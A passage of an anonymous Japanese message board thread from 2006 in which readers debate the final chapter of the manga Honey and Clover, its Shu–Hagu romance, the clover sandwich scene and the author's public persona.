ケンシロウはバットの気持ち知ってたし
ユリア一筋でリンが成長していい女になっても耐えただろーがw

444 :花と名無しさん:2006/07/28(金) 21:52:20 ID:???0
耐えれなかった修は・・・
でも最終回見ただけだとあの修はぐ告白がウソのようだ

445 :花と名無しさん:2006/07/28(金) 21:53:37 ID:???0
>>443
そりゃ知ってるが

はぐを森田か竹本に委ね、「これで良かったのだろう原田」って荒野を一人歩いて行く修が見たかった

446 :花と名無しさん:2006/07/28(金) 21:59:16 ID:0DHqzDpF0
スピンオフは絵画教室のメガネ小学生が浜美入学して、と予想。
1回だけのキャラにしては単行本のラフカットによくいるなぁと思って。

でもこの空気の中藤原デザイン話やら過去に戻って補完計画発動させたらウミノたんは神。


447 :花と名無しさん:2006/07/28(金) 22:02:57 ID:???0
    帯
 毛   
    椀
 延   
    ☆ミ 

448 :花と名無しさん:2006/07/28(金) 22:04:01 ID:???0
話はかわるけど、ハチクロ映画第2弾があるとしたら、
堺雅人と蒼井優がくっつくのか・・・

449 :花と名無しさん:2006/07/28(金) 22:04:01 ID:???0
修はぐには納得してないけど
映画もちょっと今いちだったけど
最終回に関しては泣けたしよかった。
とりあえず羽海野さんへ、もし見てたら「ありがとう」



450 :花と名無しさん:2006/07/28(金) 22:05:37 ID:???0
>>425
四葉のクローバー、そんなにあるわけないだろ!
と思っていたのですが、小3の息子が毎日2本ずつ取ってきて
「案外あるもんだな」と思ったら今日は13本取って来ました…。
群生地があるそうです。はぐもそういうところを見つけたのでしょう…。

修&はぐ どー考えても嫌だあ! 
UPされてた最終回は結構好きですが。

451 :花と名無しさん:2006/07/28(金) 22:10:22 ID:???0
既刊を読み返していたら
2巻のミドリちゃんによる人物関係解説を見て
なんとも生暖かい気持ちになった
恋の三角形の一つは破綻して
部外者扱いの修がそこに入ってきたわけで…

452 :花と名無しさん:2006/07/28(金) 22:11:20 ID:???0
>>450
へーそういう群生地ってあるんだ。
まあ最終的に修はぐにするなら、もっと早くから修→はぐの描写いれるべきだったよな…。
最終回見ると、はぐの怪我も修はぐもなくても良かったんじゃ…と思ってしまう。

453 :花と名無しさん:2006/07/28(金) 22:13:11 ID:???0
>>450
よく踏んづけられるところに四葉が多いらしい

454 :花と名無しさん:2006/07/28(金) 22:17:24 ID:???0
四葉近所の空き地にいっぱいあったよ
ものの10分で見つけられらぁ

455 :花と名無しさん:2006/07/28(金) 22:18:05 ID:???O
みなさんどこが不満かといえば、やはり臭はぐになってからがなのでしょうか??
恋愛感情じゃなく親子間の愛?のようだったら納得だったのでしょうか…。
ちょっときいてみました。

456 :花と名無しさん:2006/07/28(金) 22:18:35 ID:???0
みんな!あれはガチのクローバーじゃなくて、
海苔とか紫蘇をクローバー型にチョキチョキしたんだよ!
いくらトンデモ料理人でも、道端の草をサンドイッチの具にしないよ!




と言ってみるテスト

457 :花と名無しさん:2006/07/28(金) 22:21:05 ID:???0
竹本、あとで腹痛起こすんだろうな…。
泣きながらサンドイッチ食ったのは
思い出が走馬灯のように頭の中をめぐったり
自分のためにクローバーを探してくれたハグミの姿が
頭に浮かんだせいだけじゃなく
罰ゲームのようにまずいサンドイッチの味のせいも
あるんだろ。

458 :花と名無しさん:2006/07/28(金) 22:21:13 ID:???O
クライマックスにきて、堺萌えが露骨にダダ漏れでしたね。
連載終わってから映画化すりゃよかったのに…つくづく勿体ない。
臭はぐヲチは商業誌ではなく、自作品の同人かそれこそチラ裏でやってほしかったよ。
臭はぐさえなきゃ、名作といかなくても秀作として友人にも紹介できたのに。

459 :花と名無しさん:2006/07/28(金) 22:23:09 ID:???0
四つ葉のクローバーがたくさんワラワラ生えてる地域はある。
そういう地域は、四つ葉だけじゃなく
五つ葉や六つ葉や七つ葉も生えていたりする。
ちょっとホラーな状況。

四つ葉のクローバー自体が
「シロツメクサ」という「植物」では
「奇形」なんだし。

460 :花と名無しさん:2006/07/28(金) 22:23:17 ID:???0
クローバーって酸っぱいってこのスレで出てたけど、
竹本の食べたサンドイッチって蜂蜜の甘さとクローバーの
酸っぱさが混じり合った甘酸っぱい青春の味だったんだね☆


・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・まずそう

461 :花と名無しさん:2006/07/28(金) 22:23:58 ID:???0
まあ個人的には
山田はは野宮とくっ付かなくよかった

462 :花と名無しさん:2006/07/28(金) 22:24:47 ID:???0
>>461
外国人ですか?

463 :花と名無しさん:2006/07/28(金) 22:25:13 ID:???0
倉持君って何になりたくて受験頑張ってたんだろね。

464 :花と名無しさん:2006/07/28(金) 22:26:19 ID:???0
そもそもハチミツべったりっていうのも…
くど甘そうだー

465 :花と名無しさん:2006/07/28(金) 22:26:56 ID:???0
>>463
宇宙工学博士だか宇宙飛行士だかだったような。

466 :花と名無しさん:2006/07/28(金) 22:29:38 ID:???0
例え修ハグでも内容が丁寧に描けていればある程度は共感できるけど
あんな取って付けた様な投げ技で締められては共感などない。

最後の展開には全く付いていけなかった。

467 :花と名無しさん:2006/07/28(金) 22:29:39 ID:???0
友達がハチクロサンドを嬉しそうに差し出してきたらどうする?

468 :花と名無しさん:2006/07/28(金) 22:30:51 ID:???0
そりゃもちろん泣きながら食べますがなw

469 :花と名無しさん:2006/07/28(金) 22:31:08 ID:???0
しかし竹本にはやたらと金の重要性を思い知らせてたな
収入のない学生じゃ仕方ないと思うが
経済的に余裕のある大人以外は恋愛なんかすんじゃねーって海からのメッセージなのか?

470 :花と名無しさん:2006/07/28(金) 22:31:25 ID:???0
>>467
チョキでいくかな

471 :花と名無しさん:2006/07/28(金) 22:32:37 ID:???0
ハグの激甘い料理ってこの結末への伏線だったんだな

472 :花と名無しさん:2006/07/28(金) 22:32:39 ID:???0
>>459
北海道に修学旅行で行った時、
草原を散策してたら四葉のクローバーがわらわら
それどころか五つ葉や六つ葉もちらほら…
北海道の大地の生命力はすごいなぁと思ったが
ありがたみがなかった…

473 :花と名無しさん:2006/07/28(金) 22:34:35 ID:???0
>>467
アイスとかのミントの葉食べないタイプだから
クローバーはよけて食うと思う

474 :花と名無しさん:2006/07/28(金) 22:35:44 ID:???0
一生懸命四つ葉のクローバーを探してくれた姿を想像して感動するのも
悪くなかったけど、前の晩に自転車2人乗りして
「私もがんばる… 竹本くんに負けないくらい きっと治す 治さないと…」
(後の台詞は略)
なんて言ってたくらいなんだから、今の状態の手で頑張って描いた
クローバーの絵とかの方がよかったな。

475 :花と名無しさん:2006/07/28(金) 22:36:22 ID:???0
最近クローバーとか四葉に詳しくなってきた気がする

476 :花と名無しさん:2006/07/28(金) 22:37:03 ID:???0
>>472
あぁ、実際、>>459は北海道なんだ。
友達の家の裏庭。クローバーがワーッと生えてる。
そこでウサギを放し飼いのようにして
クローバーを食わせてるw

竹本君じゃなくてホイップちゃんに食わせればいいのに…。

ウミノさん、深く調べたりしないで
単なるイメージでだけで絵ぇ描いたり話作ってるんだろうな。
土鳩は本当は害鳥なこととか、そういうのも知らないで。

477 :花と名無しさん:2006/07/28(金) 22:40:05 ID:???0
なんか最終回で一気にハチクロ熱が下がったオレ…
必死に読んでたのになぁ…いっそ夢オチだったら笑えて終わったのに

478 :花と名無しさん:2006/07/28(金) 22:45:41 ID:???0
トトロのメイがはぐみそっくりでむかつく

479 :花と名無しさん:2006/07/28(金) 22:45:55 ID:???0
映画が個人的に良かったのでコミックス売らないことにした
でも9,10巻は買わね

480 :花と名無しさん:2006/07/28(金) 22:48:12 ID:???0
>>479
それでいいよ。
自分も1〜7巻の頃は好きだったから
その頃のコミックスは売らないで本棚に置いておいてる。

481 :花と名無しさん:2006/07/28(金) 22:49:15 ID:???O
今回泣けた私はどうかしてる?
>>447
おびわんけのび
笑えました

482 :花と名無しさん:2006/07/28(金) 22:51:42 ID:???0
実際にパンにハチミツ塗って重ねるとべっとべとで
くっついちゃわない?
はがしたら、クローバーの形こわれちゃうよ

483 :花と名無しさん:2006/07/28(金) 22:55:52 ID:???0
最終回の感想:クローバーサンドなんて不味そう…



484 :花と名無しさん:2006/07/28(金) 22:56:28 ID:???0
トトロを見てからこれだと落差にがっかりするね。
あんなに優しい作品を作れるような膿野じゃ無いとは分ってるけど

485 :花と名無しさん:2006/07/28(金) 22:57:44 ID:???0
>>482
実はハチミツじゃなくて、クローバーを樹脂で
固めたものがパンに挟まってたんだよ

だからかぶりついた次のコマでサンドイッチが
食いちぎられてないんだよ

486 :花と名無しさん:2006/07/28(金) 22:58:45 ID:???0
じゃあクローバー模様の容器にハチミツサンドとか
それじゃあインパクト弱いか
クローバー添えるだけでも良かったんじゃ

487 :花と名無しさん:2006/07/28(金) 22:58:48 ID:???0
山田作の牛すじと金柑の砂糖煮 食べてみたい。

488 :花と名無しさん:2006/07/28(金) 23:00:31 ID:???0
>>487
チャレンジャーですネ☆

489 :花と名無しさん:2006/07/28(金) 23:11:20 ID:???O
>475
なんかツボったw
>488
いや、案外イケると思う。こう…牛スジじゃないって思えば、さ☆

490 :花と名無しさん:2006/07/28(金) 23:13:52 ID:???O
ハチクロ目的でコーラス買ったのに
サムライカアサンでホロリと来てしまった


491 :花と名無しさん:2006/07/28(金) 23:30:30 ID:???0
さっき読み終えました
ええと、たった1、2回前の出来事である
臭の好きさ大好きさの展開は何のため?
野宮もなんだ、あの純情ボーイのようなキャラの変わりっぷりは
大昔ならまだしも直近のストーリーと噛み合ってないのはいかんだろー
まるで最終回だけ切り取ったみたいで全然前と繋がってない
一見綺麗にまとまってるように見えたけど、おいらは騙されんぞーヽ(`Д´)ノ

492 :花と名無しさん:2006/07/28(金) 23:35:13 ID:???0
亀ですが
クローバーの四葉は遺伝すると聞いたことがある
今年つんでも来年同じ場所に出るとかなんとか

>>490
同じく
ハチクロ終わったら買うのやめようと思ってたんだけど
つい来月も買っちゃいそうな自分がいる

493 :花と名無しさん:2006/07/28(金) 23:37:04 ID:???O
このスレの影響で、修はぐは堺×ウミノの萌え萌えドリームみたいにしか思えなくなった
修はぐエピ削ってほしいな

494 :花と名無しさん:2006/07/28(金) 23:38:35 ID:???0
というかもう何のための修はぐ展開…

495 :花と名無しさん:2006/07/28(金) 23:44:23 ID:???0
四葉のクローバー捜してる姿が山田に見える件について

496 :花と名無しさん:2006/07/28(金) 23:46:10 ID:???0
野宮が真山ツーとしか思えない
真山が増えたね、よかったね山田☆てかんじ

497 :花と名無しさん:2006/07/28(金) 23:49:59 ID:???0
竹本とはぐの自転車のシーンもはぐの大きさがちぐはぐ

498 :花と名無しさん:2006/07/28(金) 23:50:29 ID:???O
>>496
むしろ、普通の斧を泉に落としたら
金の斧になって戻ってきた感じだ。


自分は真山も野宮も別に好きじゃないけど。

499 :花と名無しさん:2006/07/28(金) 23:50:42 ID:???0
>>495
安心しろ。
みんな山田に見えてる。

500 :花と名無しさん:2006/07/28(金) 23:50:51 ID:???0
森田は大学の友人よりも映画会社のオッサンと遊んで暮らす方をとったのでしょうか?

501 :花と名無しさん:2006/07/28(金) 23:52:17 ID:???0
雑草入りサンドイッチなんてどんな嫌がらせだwwww

502 :花と名無しさん:2006/07/28(金) 23:53:20 ID:???0
だって大学に友達いないですから
唯一友達フラグあったたけのこと喧嘩別れだし

503 :花と名無しさん:2006/07/28(金) 23:54:08 ID:???0
コーラスに移ってから、はぐみの身長がすくすく伸びて
あんまりロリじゃなくなってるんだよね。
そういうところもズルいなぁ。

504 :花と名無しさん:2006/07/28(金) 23:54:30 ID:???0
>>501
天才アテクシにつまらない男が、身の程を弁えなさいって意味

505 :花と名無しさん:2006/07/28(金) 23:54:50 ID:???O
送別会、こんな白々しい関係のメンバーでよく開けるな…。
何をしゃべっても地雷だろ

506 :花と名無しさん:2006/07/28(金) 23:54:52 ID:???0
ハチクロの5人って、みんな5人以外の友達がいなさそうな人達

507 :花と名無しさん:2006/07/28(金) 23:55:00 ID:???0
>>501
昼ドラの嫁姑イジメみたいだなw

508 :花と名無しさん:2006/07/28(金) 23:55:26 ID:???0
>>504
「アテクシ最強伝説」ですね!(・∀・)

509 :花と名無しさん:2006/07/28(金) 23:55:51 ID:???0
たけのこはともかく、真山や森田がはぐや山田なんかとつるむはずないと思った
とくに映画版の森田

510 :花と名無しさん:2006/07/28(金) 23:57:37 ID:???0
>>507
あぁ、嫁姑ものじゃないけど
昼ドラで
イジメで食べられないものを男に食わすシーンといえば
牡丹と薔薇を思い出した。

牛皮の財布でステーキを作って男に喰わそうとするシーンがあった。

511 :花と名無しさん:2006/07/28(金) 23:59:09 ID:???O
最終回読もうと思って買ってきた雑誌が別冊コーラスだった件について orz...

512 :花と名無しさん:2006/07/28(金) 23:59:14 ID:???0
>>501
そりゃ涙もでるよ

513 :花と名無しさん:2006/07/28(金) 23:59:22 ID:???O
まだ修はぐがどうの言うかw
気持ちは凄くわかるがもう諦めろ
ループネタになっとる
自分なりに最終回を受け入れるんだ
もはやそれしか ないざんす

514 :花と名無しさん:2006/07/28(金) 23:59:23 ID:???O
そこはやはり【たわしコロッケ】


515 :花と名無しさん:2006/07/29(土) 00:01:14 ID:???0
>>514
あれは吹いたw

516 :花と名無しさん:2006/07/29(土) 00:01:20 ID:???0
真珠腐人ですね。

517 :花と名無しさん:2006/07/29(土) 00:02:04 ID:???0
雑草入りサンドイッチ、やっぱりカバミの竹本への嫌がらせだったのか。
とことん嫌な女だな、カバミとウミノ。

518 :名無し:2006/07/29(土) 00:03:17 ID:???O
mixiで最終回が絶賛されてる orz

519 :花と名無しさん:2006/07/29(土) 00:04:13 ID:???0
>>511
元気だしてー!

520 :花と名無しさん:2006/07/29(土) 00:08:27 ID:???O
>>519
ありがとう!しかし別冊コーラス禿げしくつまらんかった

521 :花と名無しさん:2006/07/29(土) 00:14:19 ID:???0
四葉のクローバーは犬のション便が原因と聞いた

522 :花と名無しさん:2006/07/29(土) 00:16:16 ID:???0
>>498
そんな感じだw>金の斧

523 :花と名無しさん:2006/07/29(土) 00:33:35 ID:???0
リーダーのシッコか!!!(゚Д゚)

524 :花と名無しさん:2006/07/29(土) 00:46:44 ID:???O
今回が最終回って知らなかったから読んでボーゼン。
野宮とあゆがくっついたのはよかった。

525 :花と名無しさん:2006/07/29(土) 00:48:22 ID:???0
mixiなんて馴れ合いゴッコと巨大出会い系としての機能しかありませんから、
批判なんて出る訳ないですね。

526 :花と名無しさん:2006/07/29(土) 00:59:46 ID:???P
>>518
具体的にはどんな点を絶賛してるのですか?最終回直前の流れもいまだに全肯定?



527 :花と名無しさん:2006/07/29(土) 01:16:32 ID:???0
mixiではコミュ含めて下手にアンチ発言ができないんだよな
関連ワードを日記に書いただけで直接作者が見に来ることも多いから
肯定的なことしか書けないのは事実だろうね

だからその代わりにここやアンチスレが賑わっているんだと思うけどw

528 :花と名無しさん :2006/07/29(土) 01:18:48 ID:???0
日本芸大大学院卒で山本かんさいと異母兄弟でバンドやってて
プラダのショーに出ているくらいの顔とずば抜けたスタイルで
全盛期アイドル広末の元彼で生まれたときから完璧過ぎて住む世界が違う人という感じで
遠い目でしか見れない森田の中の人。

作者キャストに影響受けまくりだったみたいだし
そんな完璧な天才とはくっつけられん。

529 :花と名無しさん:2006/07/29(土) 01:24:38 ID:???0
こら!東京藝大だろが!

530 :花と名無しさん:2006/07/29(土) 01:24:40 ID:???0
>>528
東京芸術大学

531 :花と名無しさん:2006/07/29(土) 01:42:37 ID:I5fZh9w7O
かわいい絵に詩的なモノローグ、話の筋なんか関係なくて素敵なシーンだけ描き連ねた漫画だと思っていたが、これって同人漫画そのものじゃないか。(同人の善し悪しは別として)
出身はどうあれ、そこから脱却してほしかった


532 :518:2006/07/29(土) 01:44:46 ID:???O
>>526
下手に何年後かの世界を描いてなくて最高の最終回だとか
クローバーサンド最高とか
最終回付近の流れについては誰も触れず
>>527
そうだったのか
なれあいキモスって思ってたが確かに本人とかいたら良くないよな
dです

533 :花と名無しさん:2006/07/29(土) 02:10:47 ID:???0
>>532
mixiに羽海野たんはいないけど、漫画のレビューを日記に書いたり
有名人の話をネタにしたら結構本人が見に来ることも多かったんだよ
そういう側面があるから、どこに関係者がいるかもわからないし下手なことは書けないと思ってる
変にキツイ事を書いて本人やほかのファンと揉めるのも面倒だからね

何よりも各々がプロフやマイミクから身バレしかねないので下手なことを書けないのが一番の理由かと
馴れ合うっていうか本音トークを絶対に出来ないのが近いかな

534 :花と名無しさん:2006/07/29(土) 02:21:49 ID:???0
mixiってそういう場だろうしな

535 :花と名無しさん:2006/07/29(土) 02:23:25 ID:???O
祭は終了か

536 :花と名無しさん:2006/07/29(土) 02:28:16 ID:???0
>>528
森田の中の人はな〜・・・

537 :花と名無しさん:2006/07/29(土) 02:28:24 ID:???O
>>533
丁寧に教えてくれてありがとう
そんなことがあったのか確かに身バレ恐いな
これからもっと気をつけるよ

538 :花と名無しさん:2006/07/29(土) 02:33:53 ID:???0
コーラス発売前の方が凄まじく盛り上がり、
発売後は沈静化したな・・・。
さようなら、ハチクロ。

539 :花と名無しさん:2006/07/29(土) 02:39:14 ID:???0


   同 人 漫 画 E N D

 

540 :花と名無しさん:2006/07/29(土) 03:41:55 ID:???0
なんかグッズがやたらでたり、アニメ化映画化したりして
ああ、ただ低ノイズの世界に
(自称癒しが必要な人達が)穴ごもるための漫画かと
思ってましたが、
最終回までの流れ経て、自分の中で名作に変わりました。

541 :花と名無しさん:2006/07/29(土) 03:44:32 ID:???O
>>540
流れから逆走した過程をkwsk

542 :花と名無しさん:2006/07/29(土) 03:55:26 ID:???0
いい最終回だった。
私は好きだ。

543 :花と名無しさん:2006/07/29(土) 04:12:04 ID:???0
最終回良かった。
前々回の例の修の台詞さえ削るか変えてくれれば文句は何もない。

ところでクローバーって食べれるよ。

544 :花と名無しさん:2006/07/29(土) 04:14:19 ID:???0
>>474
同人乙
陳腐だね

545 :花と名無しさん:2006/07/29(土) 04:16:28 ID:???0
>>447
あ、それ気になった。どういう意味なのかな?

546 :花と名無しさん:2006/07/29(土) 04:18:07 ID:???0
>>545
>>481

547 :花と名無しさん:2006/07/29(土) 04:30:11 ID:???O
>>543
食べれるものだとしても、やはり犬のオシッコ…等が頭をよぎってしまい食べるのは…

548 :花と名無しさん:2006/07/29(土) 04:32:10 ID:???0
>>547
劇画脳ではなく、少女漫画脳を持つのだ

549 :花と名無しさん:2006/07/29(土) 04:46:59 ID:???O
野宮にぐずぐずした自分を受け入れてもらったことで
却って山田は野宮一筋になるかもしれないね。
まあはぐと違って恋愛関係を受け入れたのだから
いつまでもふらふらしてたら最低だけど・・・

550 :花と名無しさん :2006/07/29(土) 06:35:57 ID:???0
映画とかの影響受けるくらいなら羽海野は関わるべきでは無かった。
映画の撮影現場に顔だすよりも自分の漫画に集中するべきだった。

色々なメディアにちやほやされて
羽海野チカの描く漫画は面白く無くなったと個人的には思ってます。

551 :花と名無しさん:2006/07/29(土) 06:46:16 ID:???0
>>532
遅くなったけどありがとう!


552 :花と名無しさん:2006/07/29(土) 08:17:36 ID:???0
森田が高村作品にでてくる李歐ってキャラとそっくりって、既出?

553 :花と名無しさん:2006/07/29(土) 09:06:49 ID:???0
CNNのインタビューでピーターとクロスカウンターでもやってるひとコマが欲しかった。
過去が重すぎて笑えなくなったまま終了なんて…

竹本君に共感派が多いけど、天守閣が飛ぶべきっとところで大いに森田に共感した。
森田応援してたよ。

554 :花と名無しさん:2006/07/29(土) 09:09:50 ID:???0
最終回、いろんなものを煙に巻いた感じがなんかズルいなあ
綺麗に終わらせて読者を納得させようと騙してるみたいで

555 :花と名無しさん:2006/07/29(土) 09:20:49 ID:???0
>>550
ちやほやされるのも本人はまんざらでもなかったようだし、
こうなったのはある意味必然な気がする

556 :花と名無しさん:2006/07/29(土) 09:43:16 ID:KdFOWFMCO
修ちゃんはホモだと思ってました

557 :花と名無しさん:2006/07/29(土) 09:56:27 ID:???0
あー、大人の女はダメなのかもねぇ

558 :花と名無しさん:2006/07/29(土) 09:59:47 ID:???O
修ちゃんはホモでロリ?
嫌だ…そんな修ちゃんorz

559 :花と名無しさん:2006/07/29(土) 10:05:38 ID:???0
ホモでロリ=ショタ

560 :花と名無しさん:2006/07/29(土) 10:06:26 ID:???0
>552
ガイシュツ

561 :花と名無しさん:2006/07/29(土) 10:09:51 ID:???O
作者は病んでるって聞いたんだけど、どうなん?

562 :花と名無しさん:2006/07/29(土) 10:13:50 ID:???0
本人に聞くのが一番確実

563 :花と名無しさん:2006/07/29(土) 10:24:47 ID:???0
最終回自分はよかったなあ。竹本最後に救われた感があってほっとした。
3話くらい前からの修はぐ恋愛展開さえなければ名作中の名作で終ったのに・・。
コミックスになったときまとめて読んだらどういう印象になるだろう。

564 :花と名無しさん:2006/07/29(土) 10:36:17 ID:???0
連載で1か月ずつ間が空いていてでさえ修の若返りぶりに驚いたんだから、
コミックスでまとめて読んだら、時計逆戻り的な違和感を感じると思う。

はぐの身長が急に伸びたことにもね。

565 :花と名無しさん:2006/07/29(土) 10:36:47 ID:???0
作者、すごいミーハーっぽいな。
ダ・ヴィンチのハチクロ特集のインタビューとか読んでても、
なんだかなぁ…って感じ。
あの人、徹底的に顔出さないね。いつもクマ絵。
プロフィルも出身地と仕事の経歴のみだし。自分を守る為?

566 :花と名無しさん:2006/07/29(土) 10:48:09 ID:???0
>>565
逆にミーハーでなきゃあんな作風にならないと自分は思うよ
自分の好きなものを好きだー!!と愛情かけて描かなきゃ
あのテンションは出ないと思う

作者が顔出ししないのは自分を守るとかでなく
根っから控えめかつ目立ちたがらない性格だからじゃないかな?
一人で泣きながら同人誌売ってた頃の話はケッサクだったぞw

567 :花と名無しさん:2006/07/29(土) 10:48:44 ID:???0
顔出ししないのは、読者を幻滅させないために決まってるだろ。

568 :花と名無しさん:2006/07/29(土) 10:52:52 ID:???0
森田のヴィジュアルは高村のリオウだけど、
中身は「ブラックジャック」(とスラムダンクのダブルパロディー)の
土屋だと思った。

569 :花と名無しさん:2006/07/29(土) 10:53:11 ID:???0
でも着ぐるみはかなり引く

570 :花と名無しさん:2006/07/29(土) 10:58:13 ID:???0
果てしなく自分に自信が無いんだろ

571 :花と名無しさん:2006/07/29(土) 11:02:54 ID:???0
根っから控えめかつ目立ちたがり屋じゃない人が自分に見立てたクマを
付録のキャラに使うか?

572 :花と名無しさん:2006/07/29(土) 11:04:22 ID:???0
つ自意識過剰

573 :花と名無しさん:2006/07/29(土) 11:05:19 ID:???0
つ自己陶酔

574 :花と名無しさん:2006/07/29(土) 11:05:30 ID:???0
まさに自意識過剰な人なんだろうね・・・

575 :花と名無しさん:2006/07/29(土) 11:24:57 ID:???0
>>566
詳しく

576 :花と名無しさん:2006/07/29(土) 11:38:46 ID:???0
>>552
森田みたいなキャラは大昔から幾らでも居るだろ・・・

577 :花と名無しさん:2006/07/29(土) 11:46:01 ID:???0
ウミノさんが高村薫の本に描いた李歐のビジュアルと森田がそっくりとか。
性格じゃなくあれだ、はぐとの関係性や闇の仕掛け人から晴れの成功者へという
キャラの置き方が似てるんじゃない

578 :花と名無しさん:2006/07/29(土) 12:01:45 ID:???0
ダヴィンチインタビューの着ぐるみは確かに引いた!
なんだあれ。恐いし。本人が本当に入ってんのか?ご苦労だな。

>>566
自分の好きなモノを好きだー!って、そんなの同人誌で
やれって思うけどな。プロ意識低すぎない?

579 :花と名無しさん:2006/07/29(土) 12:04:30 ID:???0
自分の好きなモノを好きだ→見てる側も楽しませたい
って意識が段々薄くなってる気がした
自己満足漫画にしか思えない

580 :花と名無しさん:2006/07/29(土) 12:15:18 ID:???0
なんにせよハチミツ不要じゃね?
普通に四葉のクローバー1本直渡しの方が感動した。
クローバーを話に入れちゃったからハチミツもとりあえすって感じなんだろうけど
無理やりいれるくらいなら、ハチミツ=甘い青春の代名詞ってことで放置してくれてよかったのに。
タイトルに意味が無いのなんてみんなとっくに知ってるんだからさ・・・・・

581 :花と名無しさん:2006/07/29(土) 12:36:42 ID:cI8xRiLI0
四葉や5・6葉が群生してるところって
土に化学物質とか毒なもんが含まれすぎてるところなんだって。
クローバーに異常を起こすような土地。


たけのこ死ぬなよ!

582 :花と名無しさん:2006/07/29(土) 12:40:49 ID:???0
いままで花本親子、山田や真山森田の毒に晒されてきたんだから
ちょっとやそっとの毒では大丈夫でしょう。

583 :花と名無しさん:2006/07/29(土) 12:41:02 ID:???0
”四葉のクローバー”って名前の苗もらったことあるよ。
たぶんほんとのシロツメ草じゃないんだけど、
四葉の、クロ−バーもどきがほんとにわっさわっさ生えてきた。

てかタイトル「よつばのクローバー」でいい気がする。ベタ?

584 :花と名無しさん:2006/07/29(土) 12:43:45 ID:???O
つか前々から思ってたけど歌手のアルバムから取ったとか痛すぎ。
たとえそうでも言わない方が良かった気がする。

585 :花と名無しさん:2006/07/29(土) 12:46:00 ID:???0
>>584
同意

>>583
それはちょっとださい

586 :花と名無しさん:2006/07/29(土) 12:46:13 ID:???0
フォローの人
毎回同人次第の話を持ち出すけど逆効果ではないか

587 :花と名無しさん:2006/07/29(土) 12:48:23 ID:???0
どういうこと??
ウミノをフォローするつもりが
フォローになってないよってこと?

588 :花と名無しさん:2006/07/29(土) 12:53:14 ID:???0
どうして有能な漫画家が事故にあって描けなくなって苦しんでたりするのに
健康に手の動く人がこんなにプロとしての自覚もなく仕事を適当にやるんだろう。
極論だとは分かっているが…。

589 :花と名無しさん:2006/07/29(土) 12:58:06 ID:???O
やっぱ修ちゃんがモンゴルに行くときのクローバーが見つからなくて
今回見つかったってのは いい感じだと思う
一生思い出に残る気がする




味も

590 :花と名無しさん:2006/07/29(土) 13:00:13 ID:???O
よく考えたらはぐも山田もリカも悪女だよな……

はぐは三人の男を振り回しておいて
山田は前の男キープしといて
リカは不幸な身の上アピールしといて

結局自分からは煮え切らない曖昧な態度しかとらないのに一方的に好かれてさ………


別に恋愛関係になくてもそういう曖昧さってウザがられないか?

591 :花と名無しさん:2006/07/29(土) 13:02:00 ID:???O
相変わらず作者叩き?は立派だなw

592 :花と名無しさん:2006/07/29(土) 13:05:09 ID:???0
今回見つかったのはいいけど
そんなモジャモジャいっぱいは嫌だ。
1本でいいがな

というか
「どうしても見つからなくて…」とか言いながら
左手で描いたへたくそな四葉のクローバーの絵とかを渡してほしかった。
食べ物オチは、いいこと思いついた☆って感じだったんだろうけど、微妙すぎる

593 :花と名無しさん:2006/07/29(土) 13:06:38 ID:???0
作者叩きと作品批判は全く別次元じゃね?
読者はあくまで客なんだから、支払った対価に見合わない商品を出されたり、
ある程度求めていたものとまったく違う次元の品物を出されたら怒って当然かと。

594 :花と名無しさん:2006/07/29(土) 13:09:24 ID:???0
>>590
真山の山田への態度も一緒だよ。
リカはまあ、最初はちゃんと拒否してたじゃん、最終的にしつこさに負けたけど。

>>591
君もう来なくていいヨ

595 :花と名無しさん:2006/07/29(土) 13:14:45 ID:???0
アニメ観たときにおもったんだけどさ、
結構ハラダもこわくね?
「お前の帰るばしょなんて俺だけで充分だろ?そうだろ?」みたいな事言ってて
独占欲強そうな感じだった。声優の言い方がよくないのかもしれないけど。

臭もハラダも、最初は保護欲でかわいがってて、それがそのうち独占欲になって
すきな女を一人で生きていけなくしちゃうタイプなんじゃ・・・
と思ったら恐ろしくなった。

596 :花と名無しさん:2006/07/29(土) 13:17:27 ID:???0
>>588
言っている意味がわからん。
ウミノフォローなんて誰もしてないと思うぞ。


597 :花と名無しさん:2006/07/29(土) 13:18:26 ID:???0
なにがなんでも叩こうと、無理にこじつけるのもどうかと思う。

598 :花と名無しさん:2006/07/29(土) 13:19:02 ID:???0
>>596
アンカ間違ってね?

599 :596:2006/07/29(土) 13:19:26 ID:???0
ごめん。間違えた。
>>586だった。

600 :花と名無しさん:2006/07/29(土) 13:19:48 ID:???0
ハチクロサンドはちょっとそれないでしょ、と思った。
ラストは何だか無理やりに綺麗に纏められた印象で自分は置いてきぼりな感じだった。
スピンオフはもうなくていいと思った。
とりあえずウミノさんお疲れ

601 :花と名無しさん:2006/07/29(土) 13:20:31 ID:???O
>>588
真っ先に岡崎京子を連想した……。

はぐの土産が食べ物だったのは、形に残らないのと四ツ葉実物を出したかったから?
別に中にはチョコとかで四ツ葉の絵が描いてあったとか
四ツ葉型に切り取った何かが挟まってたとかでもよかったと思う
現実よりウミノさんのロマン☆を優先したんだろうけどね。

602 :花と名無しさん:2006/07/29(土) 13:25:01 ID:???0
>>596
たぶん>>566みたいな人を言ってんでしょ

603 :花と名無しさん:2006/07/29(土) 13:26:45 ID:???0
>>597
どれに対して言ってるのかわからないけど、
自分は「叩く」って意識はない。
他の人はどうだか知らんが
自分はここは妙だね、こう解釈も出来るね、でもこうなんじゃない?こっちの方がいいのにね。
みたいなその程度の意識で書いてる。
小学校の国語の時間の話し合いみたいな。
それが「叩く」ということで否定されるべき行為なら、情報交換以外で、掲示板の意味はなんだ?

604 :花と名無しさん:2006/07/29(土) 13:27:04 ID:???0
同人出身の人は、私怨叩きが必ずいるなあ
私怨はなくとも嫉妬がものすごい。

605 :花と名無しさん:2006/07/29(土) 13:28:17 ID:???0
無理にこじつけってどの辺が?

606 :花と名無しさん:2006/07/29(土) 13:29:22 ID:???O
いかなりはぐと修がアレになったのは、ハチクロを単なる恋愛ドラマとしてしか見せていない映画やアニメの奴らがバンバン打ち出してた「登場人物は全員片想い!」ていうウタイ文句に流されちゃったんかなと思って心配になりました。

607 :花と名無しさん:2006/07/29(土) 13:30:50 ID:???0
>>603
そもそも見る目にフィルターかかりまくってるから
人から見たらこじつけ叩きにみえるんじゃない?
2ちゃんにおいては悪い事とは思えないけど、
「なぜそこまで・・」って言われるのはしょうがない。


608 :花と名無しさん:2006/07/29(土) 13:31:11 ID:???O
>>603
マンセー意見以外を何でもアンチあつかいするのは幼稚な考えだよね。
展開に納得いかなくて残念がってる人たちだってハチクロが好きで見守ってきたからこそガッカリしちゃったわけだし。

609 :花と名無しさん:2006/07/29(土) 13:31:29 ID:???0
だから、
